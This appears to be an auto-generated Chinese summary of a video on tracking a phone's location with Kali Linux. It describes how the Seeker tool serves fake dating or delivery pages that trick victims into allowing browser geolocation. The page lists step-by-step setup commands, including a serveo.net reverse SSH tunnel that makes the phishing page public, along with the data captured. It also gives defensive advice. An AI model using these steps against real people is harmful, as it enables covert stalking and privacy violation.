How to Track Any Phone Location using Kali Linux?
三句話摘要
攻擊者利用瀏覽器 Geolocation API 與社交工程手法,誘騙受害者主動授權,即可取得精確 GPS 座標,無需任何漏洞利用。 瀏覽器定位授權的「Allow」按鈕是最廉價的追蹤工具,防禦它不需要任何技術手段,只需要在點擊前多問一句「它為什麼需要知道我在哪裡?」 攻擊不依賴技術漏洞,而是利用「情境合理性」操控信任。 攻擊者複製合法服務的視覺設計(外送確認、交友配對、叫車服務),讓受害者在認知上覺得授權定位是合理的操作,從而自願點擊 Allow。
重點整理
重點- 1
攻擊不依賴技術漏洞,而是利用「情境合理性」操控信任。 攻擊者複製合法服務的視覺設計(外送確認、交友配對、叫車服務),讓受害者在認知上覺得授權定位是合理的操作,從而自願點擊 Allow。
- 2
瀏覽器 Geolocation API 本身是合法功能,無法被封鎖,只能靠使用者判斷。 惡意請求與 Google Maps 的合法請求在視覺呈現上完全相同,作業系統層的提示無法區分善意與惡意來源。
- 3
單次授權可同時洩漏多層資訊。 除精確 GPS 座標外,還會捕獲 IP 位址(可推算 ISP 與大略地區)、作業系統、CPU 核心數、RAM、GPU、螢幕解析度,攻擊者可利用這些資訊規劃後續裝置特定攻擊。
- 4
Serveo 等免費 SSH 隧道工具讓攻擊門檻極低。 攻擊者只需一台本地機器,透過一條 SSH 指令即可取得公網 URL,讓釣魚頁面對任何裝置可達,整個環境建置無需任何付費基礎設施。
實用技巧與重點
乾貨- 工具: Seeker(Python,開源,GitHub)、Serveo(免費 SSH 隧道)
- 捕獲資料: 緯度、經度(精度達公尺級)、IP 位址、OS、平台架構、CPU 核心數、RAM、GPU、螢幕解析度、瀏覽器版本
- 架設指令流程:
- `sudo apt update && sudo apt upgrade`
- `git clone <seeker-repo-url>`
- `cd seeker && chmod +x install.sh && ./install.sh`
- `python3 seeker.py` → 選模板 `0`(Near You)→ 伺服器啟動於 port 8080
- `ssh -R 80:localhost:8080 serveo.net` → 取得公網 URL
- 模板情境範例: Near You(交友配對)、外送地址確認、天氣 App、叫車服務
- 防禦操作: 瀏覽器設定 → 查看已授權定位的網站清單 → 撤銷不認識或不再使用的網站;手機設定 → 定位服務僅在使用導航時開啟
結論
結論“瀏覽器定位授權的「Allow」按鈕是最廉價的追蹤工具,防禦它不需要任何技術手段,只需要在點擊前多問一句「它為什麼需要知道我在哪裡?」”
完整解析
詳細現代智慧型手機的瀏覽器內建 Geolocation API,允許網站在使用者同意後取得裝置的 GPS 座標。這項功能本身是合法且有實用價值的技術,Google Maps、Uber 等服務每天都在依賴它運作。問題在於,這個機制沒有辦法從技術層面區分請求者是否真的有正當理由——所有的判斷都落在使用者的「情境感知」上,而這正是攻擊者可以操控的弱點。
影片示範的攻擊手法稱為社交工程定位追蹤,核心工具是開源的 Seeker。攻擊者先在本地以 `python3 seeker.py` 啟動 Seeker,選擇「Near You」模板,伺服器在 port 8080 提供一個外觀專業、設計精緻的假交友或見面服務頁面。使用者在情境驅動下點擊「Continue」,瀏覽器隨即彈出標準的定位授權提示——這個提示框與任何合法服務完全相同,沒有任何視覺警示能區分善意與惡意。一旦使用者點擊「Allow」,受害者的精確 GPS 座標(含緯度與經度)、IP 位址,以及詳細的裝置硬體規格,便即時回傳至 Seeker 的終端機,並自動生成一個 Google Maps 連結,直接在地圖上標出受害者的所在位置,精度達公尺級。
為了讓攻擊可以跨裝置進行,講者接著用 `ssh -R 80:localhost:8080 serveo.net` 建立 SSH 反向隧道,Serveo 免費提供一個公開 URL,使本地伺服器對網際網路上的任何裝置可達。講者在手機上開啟該 URL,頁面在行動裝置上同樣具有響應式設計,操作體驗與真實服務無異。手機點擊 Allow 後,終端機立即顯示手機的完整裝置資訊與 GPS 座標,Google Maps 連結精確標出手機的實體位置。整個攻擊流程不涉及任何零日漏洞、惡意程式安裝或複雜駭客技術,只需要一個有說服力的網頁與合理的情境敘事。
防禦的核心是建立「情境懷疑習慣」。使用者應在每次遇到定位授權請求時主動問自己:這個網站有沒有真正的理由需要我的 GPS 座標?導航、叫車、外送服務有合理需求,但陌生連結、社群媒體個人頁面或任何非預期的請求則應直接拒絕。此外,應定期進入瀏覽器與手機設定,審查並撤銷已授權定位的網站與應用程式,並在非必要時關閉系統層的定位服務。若收到可疑的外送確認連結,應直接透過官方管道聯繫業者,而非點擊連結授權。
關鍵時刻
Pipeline v2帶時間戳的重點,會在逐字稿層級分析上線後產生。目前請先透過原始影片觀看。
事實查核
Pipeline v2說法查證是下一次管線升級的一部分。KeyFrame 只會顯示它真正能驗證的內容。
